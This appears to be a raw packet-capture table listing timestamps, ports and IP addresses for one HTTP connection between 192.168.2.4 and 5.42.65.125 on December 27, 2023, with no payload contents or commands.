Dec 27, 2023 18:12:25.183201075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.183211088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.183222055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.183227062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.183254004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.184007883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184020996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184031010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184041977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184060097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.184067011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184078932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184082985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.184089899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184097052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.184101105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184113026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184125900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.184140921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184153080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184154034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.184166908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184178114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184180975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.184190035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184216976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.184493065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184505939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184540033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.184562922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184586048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184597969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184607983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.184624910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184637070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184637070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.184668064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184670925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.184762955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184775114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184786081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184804916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184808016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.184834003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184834957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.184845924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.184880018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.185554028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.185612917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.185625076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.185636044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.185655117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.185673952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.185744047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.185756922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.185766935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.185777903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.185777903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.185789108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.185801029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.185805082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.185812950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.185823917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.185832024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.185836077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.185847998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.185851097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.185874939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.186280966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.186295033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.186305046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.186317921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.186325073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.186331034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.186338902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.186368942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.186403990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.186417103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.186430931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.186476946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.186798096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.186832905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.186841965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.186853886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.186866045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.186877966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.186885118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.186901093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.186911106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.186913013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.186924934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.186955929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.186989069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.187052011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.187067986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.187079906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.187093973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.187105894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.187119961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.187135935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.187742949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.187756062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.187767029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.187798023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.187808037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.187820911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.187827110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.187833071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.187850952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.187856913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.187877893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.187890053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.187890053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.187912941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.187921047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.187956095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.187968016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.188003063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.188005924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.188018084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.188036919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.188669920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.188680887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.188710928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.188714981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.188745022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.188750029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.188759089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.188770056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.188791037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.188792944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.188824892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.188844919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.188855886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.188886881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.188894987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.188920975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.188932896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.188945055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.188980103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.188982964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.189595938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.189608097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.189619064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.189640999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.189662933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.189744949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.189757109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.189768076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.189779043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.189789057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.189790964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.189811945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.190330982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.190344095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.190367937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.190385103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.190397024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.190407991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.190417051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.190443039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.190474987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.190486908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.190498114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.190510035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.190521002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.190541983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.190547943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.190555096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.190566063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.190577030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.190587997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.190591097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.190610886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.191145897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.191157103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.191168070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.191179037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.191179991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.191191912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.191203117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.191205025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.191231012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.191255093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.191267014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.191277981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.191287994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.191288948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.191301107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.191312075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.191313982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.191323996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.191334963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.191338062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.191354990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.191961050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.191998959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192001104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.192011118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192044020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.192079067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192107916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192120075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192151070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.192153931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192166090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192177057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192188978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192190886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.192199945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192210913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192214966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.192223072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192234993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192241907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.192915916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192926884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192938089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192939043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.192951918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192960978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.192964077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.192991972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.193001986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.193011045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.193022966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.193033934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.193075895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.193383932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.193407059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.193419933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.193442106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.193455935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.193485022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.193533897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.193545103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.193556070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.193566084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.193593025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.193614960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.193627119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.193659067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.193664074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.193670988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.193682909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.193696022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.193707943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.193717957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.193743944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.194317102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.194329977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.194353104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.194366932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.194396973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.194432020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.194504023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.194515944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.194525957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.194538116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.194547892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.194550991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.194561958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.194572926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.194577932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.194583893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.194606066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.194612980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.194618940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.194631100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.194639921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.194664955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.195261002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.195288897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.195319891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.195333004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.195344925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.195358038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.195385933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.195414066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.195425987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.195436954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.195446014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.195472002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.195496082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.195508003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.195518017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.195528030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.195535898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.195538998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.195550919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.195568085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.195573092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.195594072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.196219921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196357965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196369886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196379900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196393013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196396112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.196404934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196427107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.196593046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196607113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196630955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.196683884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196696043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196706057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196717024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196717024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.196734905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196736097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.196758986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196768045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.196805954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196818113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196851015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.196852922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196883917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196887970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.196897030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196908951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196919918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.196928978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.196952105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.197571039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.197649002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.197662115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.197695017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.197700977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.197730064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.197735071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.197747946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.197782993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.197808027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.197820902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.197832108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.197844028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.197855949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.197865009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.197866917 CET	80	49738	5.42.65.125	192.168.2.4
